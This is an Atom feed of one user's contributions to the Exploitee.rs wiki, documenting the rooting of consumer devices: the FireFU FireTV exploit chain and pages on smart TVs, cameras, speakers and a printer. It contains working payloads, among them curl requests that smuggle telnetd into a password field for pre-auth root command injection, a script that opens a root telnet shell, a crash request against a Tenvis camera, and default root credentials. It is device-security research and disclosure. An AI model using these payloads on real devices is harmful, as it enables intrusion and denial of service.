<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.exploitee.rs/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=0x00string</id>
	<title>Exploitee.rs - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.exploitee.rs/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=0x00string"/>
	<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Special:Contributions/0x00string"/>
	<updated>2026-04-30T17:13:04Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.45.0-alpha</generator>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=FireFU_Exploit&amp;diff=2988</id>
		<title>FireFU Exploit</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=FireFU_Exploit&amp;diff=2988"/>
		<updated>2018-11-01T04:20:24Z</updated>

		<summary type="html">&lt;p&gt;0x00string: /* Attack Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Category:Exploits]]&lt;br /&gt;
[[Category:Media Players]]&lt;br /&gt;
&lt;br /&gt;
[[File:FireFULogo.png||250px|left|thumb]]&lt;br /&gt;
&lt;br /&gt;
= FireFU =&lt;br /&gt;
FireFU is an exploit chain leveraging a read write primitive from the FireTV Cube and Pendant’s  Amlogic S905Z microcontroller along with a heap overflow within the parsing of the devices RSV partition table allowing for the running of unsigned code. &lt;br /&gt;
&lt;br /&gt;
== Attack Summary ==&lt;br /&gt;
This is all done through the exploit&#039;s install script but is documented here for the curious.&lt;br /&gt;
&lt;br /&gt;
# We enter DFU mode by connecting to the devices HDMI port and passing “boot@USB” to the Amlogic S905Z through the HDMI’s i2c interface.&lt;br /&gt;
## In DFU mode, we are able to read and write memory. we leverage the read/write primitive to write to hardware registers for the MMC controller. &lt;br /&gt;
# After entering DFU, we write to the emmc controller to modify the devices flash.&lt;br /&gt;
## We copy the original RSV table to a new locations 3 blocks away.&lt;br /&gt;
## We modify the partition table layout to exploit a heap overflow within u-boot&lt;br /&gt;
### Heap overflow can be found in “bootloader/uboot-amlogic/p212/drivers/mmc/aml_emmc_partition.c” - get_ptbl_rsv()&lt;br /&gt;
#### U-Boot doesn&#039;t check for buffer size correctly when reading the partition table from RSV in eMMC&lt;br /&gt;
#### Exploit modifies the following in RAM&lt;br /&gt;
##### amzn_target_is_unlocked() to alway return 1&lt;br /&gt;
##### patch amzn_dm_verity_is_off to return true&lt;br /&gt;
##### patch amzn_target_device_type to alway return engineering device&lt;br /&gt;
##### fixup bootm address for fastboot&lt;br /&gt;
## Because we exploit u-boot early on in the boot chain and we do it every boot, we are able to modify u-boot in ram breaking the secure boot “chain of trust” and allowing for unsigned code to be ran.&lt;br /&gt;
# The HDMI i2c connection is then disconnected and the device is rebooted into fastboot&lt;br /&gt;
## From fastboot we flash the following&lt;br /&gt;
### a new boot.img with magisk installed for superuser access&lt;br /&gt;
### a new recovery to fix issues with the Fire Tv recovery accessing the old RSV location.&lt;br /&gt;
# We then reboot to complete the root process.&lt;br /&gt;
&lt;br /&gt;
== Flow Chart ==&lt;br /&gt;
[[File:FireFuFlow.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
== Exploit ==&lt;br /&gt;
DFU + U-Boot Exploit for AFTV Stark + Needle&lt;br /&gt;
&lt;br /&gt;
* Tested on FW 6.2.5.5 for Needle&lt;br /&gt;
* Tested on FW 6.2.5.5 for Stark&lt;br /&gt;
&lt;br /&gt;
=== Disclaimer ===&lt;br /&gt;
Exploitee.rs would like to remind users that any flashing of unofficial firmware or usage of provided tools is done at your own risk and will likely void your device’s warranty.&lt;br /&gt;
&lt;br /&gt;
=== Preamble ===&lt;br /&gt;
While this process can be done in a virtual machine, a lot of data is backed up and flashed during this process and a VM environment will drastically slow down communication in DFU mode. &lt;br /&gt;
&lt;br /&gt;
=== Tools Needed ===&lt;br /&gt;
# AFTV Stark/Needle&lt;br /&gt;
# HDMI breakout or an HDMI cable that can be cut&lt;br /&gt;
# Arduino, Teensy or any Arduino compatible dev board that provides an I2C bus.&lt;br /&gt;
# Linux box&lt;br /&gt;
&lt;br /&gt;
=== Preparing HDMI dongle ===&lt;br /&gt;
This process has only been tested with the Arduino Due and Teensy 3. Other boards are untested!&lt;br /&gt;
&lt;br /&gt;
#Please check Wikipedia for the standard HDMI pinout: https://en.wikipedia.org/wiki/HDMI&lt;br /&gt;
#connect following pin to your Arduino &amp;lt;table&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;HDMI&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Arduino&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;PIN 15 (SCL)&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;I2C SCL&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;PIN 16 (SDA)&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;I2C SDA&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;PIN 17 (GND)&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;I2C GND&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&lt;br /&gt;
#Hook up the Arduino to your PC and flash the hdmi_arduino.ino sketch in the hdmi_dongle/hdmi_arduino folder.&lt;br /&gt;
&lt;br /&gt;
=== Rooting Proccess ===&lt;br /&gt;
# setup udev rules (or equivalent) to allow usb access for &lt;br /&gt;
#* idVendor=1b8e, idProduct=c003 (aml DFU)&lt;br /&gt;
#** ID 1b8e:c003 Amlogic, Inc.&lt;br /&gt;
#* idVendor=18d1, idProduct=0d02 (fastboot)&lt;br /&gt;
#** ID 18d1:0d02 Google Inc. Celkon A88&lt;br /&gt;
# DFU tool depends on libusb so make sure libusb is install&lt;br /&gt;
# Connect the HDMI dongle to your AFTV &amp;amp; power to your Arduino (or equivalent)&lt;br /&gt;
# Connect micro-usb cable to your AFTV&lt;br /&gt;
# Power up the FireTV device&lt;br /&gt;
# Check lsusb on your linux box to see if the device has entered DFU mode&lt;br /&gt;
#* look for something similar to this: ID 1b8e:c003 Amlogic, Inc.                                            &lt;br /&gt;
#* if the device does not show up then try to reset the FireTV and try again&lt;br /&gt;
# Run install_exploit.sh on your linux box&lt;br /&gt;
#* This process can take about 30min-60min&lt;br /&gt;
#* Remember to keep your backup safe!&lt;br /&gt;
# Side load Magisk Manager apk on your AFTV &lt;br /&gt;
#* Download APK from https://github.com/topjohnwu/Magisk/releases&lt;br /&gt;
#* adb install magisk.apk&lt;br /&gt;
# Done :)&lt;br /&gt;
&lt;br /&gt;
=== Miscellaneous Information ===&lt;br /&gt;
&lt;br /&gt;
==== Disabling OTA ====&lt;br /&gt;
Any update can remove the code signing update or possibly brick the device. We recommend disabling OTA updates with the following.&lt;br /&gt;
* Run following commands as root&lt;br /&gt;
** pm disable com.amazon.tv.forcedotaupdater&lt;br /&gt;
** pm disable com.amazon.device.software.ota&lt;br /&gt;
** pm disable com.amazon.device.software.ota.override&lt;br /&gt;
You can also block update DNS domain at your router or install a custom recovery to be safe.&lt;br /&gt;
&lt;br /&gt;
==== OTA Updates &amp;amp; Installing New Images ====&lt;br /&gt;
After each amazon supplied new image or OTA update, you must patch the boot and recovery images again (because of FireFu&#039;s RSV relocation).&lt;br /&gt;
&lt;br /&gt;
Steps to patch boot+recovery image if you accidently flash unpatch image / take OTA image:&lt;br /&gt;
# Enter DFU mode with the HDMI dongle&lt;br /&gt;
# Dump the boot image:&lt;br /&gt;
#* ./aml_usb_mmc -r -s 0x16800 -c 0x8000 -f backup_boot.img&lt;br /&gt;
# Dump the recovery image:&lt;br /&gt;
#* ./aml_usb_mmc -r -s 0x1F000 -c 0x8000 -f backup_recovery.img&lt;br /&gt;
# Patch the boot image:&lt;br /&gt;
#* cd magisk_patcher&lt;br /&gt;
#* ./boot_patch.sh backup_boot.img&lt;br /&gt;
# Patch the recovery image:&lt;br /&gt;
#* cd magisk_patcher&lt;br /&gt;
#* AFTV_ONLY_RSV_TABLE=1 ./boot_patch.sh backup_recovery.img&lt;br /&gt;
# Enter Fastboot:&lt;br /&gt;
#* Enter DFU mode with the HDMI dongle&lt;br /&gt;
#* check to see if device enumerated with lsusb. if not, reboot and retry&lt;br /&gt;
#* run ./aml_reboot fastboot&lt;br /&gt;
#* The device should now be in fastboot mode&lt;br /&gt;
# Flash the boot image:&lt;br /&gt;
#* fastboot flash boot IMAGE.img&lt;br /&gt;
# Flash the recovery image:&lt;br /&gt;
#* fastboot flash recovery IMAGE.img&lt;br /&gt;
&lt;br /&gt;
=== Downloads ===&lt;br /&gt;
Below is the download information for the exploit.&lt;br /&gt;
&lt;br /&gt;
==== Exploit package ====&lt;br /&gt;
This download is intended for users who are only seeking the binaries to perform the exploit.&lt;br /&gt;
&lt;br /&gt;
==== Source Code ====&lt;br /&gt;
This is for the users who are needing to recompile the exploit or are just curious about the process.&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Vizio_P602UI&amp;diff=2871</id>
		<title>Vizio P602UI</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Vizio_P602UI&amp;diff=2871"/>
		<updated>2017-08-09T06:05:39Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:VIZIO_P602UI.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Television]]&lt;br /&gt;
&lt;br /&gt;
=Vizio P602UI=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;Simply Beautiful! Introducing the all-new VIZIO P-Series Ultra HD Full-Array LED Smart TV. With powerful Ultra HD performance and best-in-class picture quality of Full-Array LED backlight, 64 Active LED Zones, and Clear Action 960 for incomparable contrast levels, sharpest details and deepest, purest black levels, the P-Series is your crystal-clear window to an exhilarating world where picture is everything. In addition, P-Series is fully equipped and ready for nearly all Ultra HD entertainment options. With support for HEVC decoding and the latest Wi-Fi standard 802.11ac, P-Series lets you stream Ultra HD from popular apps such as Netflix. Its superior Spatial Scaling Engine accurately and beautifully transforms your favorite 1080p Full HD sports, movies, and TV shows into spectacular Ultra HD. And support for the latest HDMI standards enables Ultra HD playback from next generation cable and satellite receivers, Blu-ray players and game consoles. The VIZIO P-Series: Simply Beautiful.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/VIZIO-P602ui-B3-60-Inch-Ultra-Smart/dp/B00M2FBEG0/ref=cm_cd_al_qh_dp_t?tag=exploiteers-20 Purchase the Vizio P602UI at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Hardware Root==&lt;br /&gt;
The eMMC chip on this device is located [pictured]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
VIZIO_P602UI_EMMC.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
dump emmc&lt;br /&gt;
&lt;br /&gt;
review filesystem&lt;br /&gt;
&lt;br /&gt;
add persistent telnet shell&lt;br /&gt;
&lt;br /&gt;
==Software Root==&lt;br /&gt;
&lt;br /&gt;
TV has a HTML User Manual, opened via the &amp;quot;hidden&amp;quot; Opera Browser. The User Manual has an update procedure which downloads a tar file, uses gpg for signing.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
sigma.exec(&amp;quot;wget https://....&amp;quot;);&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A custom App can open a webpage on the local filesystem&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
URL=file://rw_data/yahoo/data/Widgets/Installed/5.com.exploiteers.1.widget/Contents/vizio.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Custom HTML page contains&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
var sigma = new SigmaBridge();&lt;br /&gt;
sigma.exec(&amp;quot;/bin/busybox telnetd -l/bin/sh -p1337&amp;quot;);&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Launch the app, log in via telnet or netcat&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Tenvis_T8810&amp;diff=2870</id>
		<title>Tenvis T8810</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Tenvis_T8810&amp;diff=2870"/>
		<updated>2017-08-09T06:04:37Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:TENVIS_T8110.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Networking]]&lt;br /&gt;
&lt;br /&gt;
=Tenvis T8810=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/Indoor-Security-Camera-Baby-Monitor/dp/B01MFBBYO8/ref=cm_cd_al_qh_dp_t?tag=exploiteers-20 Purchase the Tenvis T8810 at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Hardware Root==&lt;br /&gt;
The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
TENVIS_T8110_UART.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Remote Denial of Service==&lt;br /&gt;
&lt;br /&gt;
===WARNING===&lt;br /&gt;
&lt;br /&gt;
This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.&lt;br /&gt;
&lt;br /&gt;
Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
curl &#039;http://192.168.1.88/cgi-bin/hi3510/param.cgi&#039; -H &#039;Authorization: Basic YWRtaW46YWRtaW4=&#039; -H &#039;Content-Type: application/x-www-form-urlencoded&#039; -H &#039;Connection: keep-alive&#039; --data &#039;cmd=setwirelessattr&amp;amp;cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&amp;amp;-wf_ssid=%0Assidgoesheres%0D&amp;amp;-wf_auth=3&amp;amp;-wf_mode=%0Dabcdef&amp;amp;-wf_enc=0&amp;amp;-wf_enable=1&amp;amp;-wf_key=key12345&#039; --compressed​&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Samsung_SL-M3320ND&amp;diff=2869</id>
		<title>Samsung SL-M3320ND</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Samsung_SL-M3320ND&amp;diff=2869"/>
		<updated>2017-08-09T06:03:35Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:SAMSUNG_SLM3320ND.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Networking]]&lt;br /&gt;
&lt;br /&gt;
=Samsung SL-M3320ND Printer=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;The robust ProXpress M3320ND features print speeds of up to35 ppm. Powered by a Cortex™-A5 core processor and 128 MB of memory, it delivers unsurpassed performance for business applications. High performance coupled with ease-of-use enables businesses to accelerate document and image processing for increased efficiency.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/Samsung-ProXpress-SL-M3320ND-Monochrome-Printer/dp/B00COA3GVE/ref=sr_1_3?s=electronics&amp;amp;ie=UTF8&amp;amp;qid=1502258594&amp;amp;sr=1-3&amp;amp;tag=exploiteers-20 Purchase the Samsung SL-M3320ND at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Unsigned NAND Backup and Overwrite==&lt;br /&gt;
&lt;br /&gt;
?????????&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
SAMSUNG_SLM3320ND_NAND.JPG&lt;br /&gt;
SAMSUNG_SLM3320ND_FW_HEX.JPG&lt;br /&gt;
SAMSUNG_SLM3320ND_INK_LEVEL.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=MUZO_Cobblestone&amp;diff=2868</id>
		<title>MUZO Cobblestone</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=MUZO_Cobblestone&amp;diff=2868"/>
		<updated>2017-08-09T06:02:46Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:MUZO.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:IOT]]&lt;br /&gt;
&lt;br /&gt;
=MUZO Cobblestone=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wireless. Now you can control music play to your speakers without having to connect your audio cable to your speakers. Cobblestone is easy to set-up. Just connect your Cobblestone to your speaker, amplifier or receiver, and configure your Cobblestone to your home Wi-Fi network with our MUZO Player app and start streaming your favorite music. It’s as easy as that. AirPlay multi-room is supported for Cobblestones and not yet supported for 3rd party Airplay devices.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/MUZO-Cobblestone-Wi-Fi-Audio-Receiver/dp/B00N9NZIKM/ref=sr_1_1?s=electronics&amp;amp;ie=UTF8&amp;amp;qid=1502258551&amp;amp;sr=1-1&amp;amp;tag=exploiteers-20 Purchase the MUZO Cobblestone at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Telnet Default Credentials==&lt;br /&gt;
&lt;br /&gt;
Device permits logins as root with username &amp;lt;code&amp;gt;admin&amp;lt;/code&amp;gt; and password &amp;lt;code&amp;gt;admin&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Pre Auth Root Command Injection==&lt;br /&gt;
&lt;br /&gt;
Target: /httpapi.asp&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
curl &#039;http://192.168.43.37/httpapi.asp&#039; -H &#039;CONTENT-TYPE: application/x-www-form-urlencoded&#039; -H &#039;Accept: */*&#039; -H &#039;Cache-Control: no-cache&#039; -H &#039;Connection: keep-alive&#039; -H &#039;If-Modified-Since: 0, 0&#039; --data &#039;command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0&#039; --compressed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connect to the telnet service as root&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=AOBO_Hidden_Spy_Camera_720P&amp;diff=2867</id>
		<title>AOBO Hidden Spy Camera 720P</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=AOBO_Hidden_Spy_Camera_720P&amp;diff=2867"/>
		<updated>2017-08-09T05:59:58Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:AOBO.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Camera]]&lt;br /&gt;
&lt;br /&gt;
=AOBO Hidden Spy Camera 720P=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;AOBO Hidden 720p Camera features a high definition 1280x720P video resolution. This hidden camera is the world&#039;s smallest HD camera which makes it the perfect camera and video recording or forensic tool for anyone. With its portable and hidden nature can record what happens at every moment.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/Hidden-Camera-Wireless-Portable-Security/dp/B06XVDHTXR/ref=sr_1_1?s=electronics&amp;amp;ie=UTF8&amp;amp;qid=1502255449&amp;amp;sr=1-1&amp;amp;tag=exploiteers-20 Purchase the AOBO Hidden Spy Camera 720P at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Open Wifi and Passwordless Telnet==&lt;br /&gt;
The Camera creates an open wireless access point, and spawns a Telnet and FTP service. Login using username root with no password.&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=GGMM_E3_Smart_Speaker&amp;diff=2866</id>
		<title>GGMM E3 Smart Speaker</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=GGMM_E3_Smart_Speaker&amp;diff=2866"/>
		<updated>2017-08-09T05:58:45Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:GGMME3.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:IOT]]&lt;br /&gt;
&lt;br /&gt;
=GGMM E3 Smart Speaker=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;Enjoy the full rich sound by wirelessly streaming your favirote music to GGMM E3. E3 uses Wi-Fi/ Bluetooth 4.0 technology to equally project exquisite audio wirelessly.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA/ref=sr_1_1?s=electronics&amp;amp;ie=UTF8&amp;amp;qid=1502258299&amp;amp;sr=1-1&amp;amp;tag=exploiteers-20 Purchase the GGMM E3 Smart Speaker at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Pre Auth Root Command Injection==&lt;br /&gt;
&lt;br /&gt;
Target: /httpapi.asp&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
curl &#039;http://192.168.43.37/httpapi.asp&#039; -H &#039;CONTENT-TYPE: application/x-www-form-urlencoded&#039; -H &#039;Accept: */*&#039; -H &#039;Cache-Control: no-cache&#039; -H &#039;Connection: keep-alive&#039; -H &#039;If-Modified-Since: 0, 0&#039; --data &#039;command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0&#039; --compressed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connect to the telnet service as root&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Cujo&amp;diff=2865</id>
		<title>Cujo</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Cujo&amp;diff=2865"/>
		<updated>2017-08-09T05:57:52Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:CUJO.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:IOT]]&lt;br /&gt;
&lt;br /&gt;
=Cujo=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;CUJO shields your home devices against hacks. CUJO network security firewall protects your computers and IoT devices against malware, ransomware, viruses, and other hacking threats. Think of it as advanced antivirus for all your connected devices - from laptops to smartphones.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/CUJO-Internet-Security-Firewall-SUBSCRIPTION/dp/B01MSEX7PT/ref=sr_1_1?ie=UTF8&amp;amp;qid=1502255730&amp;amp;sr=8-1&amp;amp;tag=exploiteers-20 Purchase the Cujo at Amazon]&lt;br /&gt;
&lt;br /&gt;
==UART==&lt;br /&gt;
&lt;br /&gt;
The UART Interface runs at ???????? baud at the pinout pictured&lt;br /&gt;
&lt;br /&gt;
Drop to a U-Boot shell by grounding the eMMC data line at the right spot&lt;br /&gt;
&lt;br /&gt;
After stage 1, while stage 2 is booting, hold for 3-4 seconds to ground&lt;br /&gt;
&lt;br /&gt;
???????????&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
CUJO_GLUE.JPG&lt;br /&gt;
CUJO_UART.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Boot Output===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
OCTEON eMMC stage 1 bootloader (CUJOv1.0)&lt;br /&gt;
Loading stage2&lt;br /&gt;
Success.&lt;br /&gt;
Branching to stage 2 at: 0xFFFFFFFF81000000&lt;br /&gt;
U-Boot 2013.07 (Development build, svnversion: u-boot:directory, exec:) (Build time: Dec 22 2016 - 21:42:51)&lt;br /&gt;
Cavium Inc. OCTEON SDK version 3.1.2, build 568: $Revision: 128476 $&lt;br /&gt;
EARLY FILL COUNT                              : 14, cpu_hertz:1000000000, ddr_hertz:666000000&lt;br /&gt;
LMC0 Asserting DDR_RESET_L&lt;br /&gt;
DDR Reference Hertz = 50000000&lt;br /&gt;
clkr:  0, en[5]:  6, clkf:   79, pll_MHz: 4000, ddr_hertz: 666666666, error:  -666666&lt;br /&gt;
clkr:  0, en[2]:  3, clkf:   39, pll_MHz: 2000, ddr_hertz: 666666666, error:  -666666&lt;br /&gt;
clkr:  1, en[2]:  3, clkf:   79, pll_MHz: 2000, ddr_hertz: 666666666, error:  -666666&lt;br /&gt;
clkr:  2, en[2]:  3, clkf:  119, pll_MHz: 2000, ddr_hertz: 666666666, error:  -666666&lt;br /&gt;
clkr:  2, en[1]:  2, clkf:   79, pll_MHz: 1333, ddr_hertz: 666666666, error:  -666666&lt;br /&gt;
clkr:  0, en[5]:  6, clkf:   79, pll_MHz: 4000, ddr_hertz: 666666666, error:  -666666 &amp;lt;==&lt;br /&gt;
LMC0 De-asserting DDR_RESET_L&lt;br /&gt;
LMC0: Measured DDR clock: 666666794, cpu clock: 1000000000, ddr clocks: 133333699&lt;br /&gt;
LMC0: measured speed: 666666794 hz&lt;br /&gt;
Initializing node 0 DDR interface 0, DDR Clock 666666794, DDR Reference Clock 50000000, CPUID 0x000d9602&lt;br /&gt;
DDR SPD Table:&lt;br /&gt;
DIMM 0: DDR3 UDIMM, non-ECC  D3-56CG107JT9V-999  chksum: 49305 (0xc099) 1.5V&lt;br /&gt;
row bits: 15, col bits: 10, bank bits: 3, banks: 8, ranks: 1, dram width: 16, size: 1024 MB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
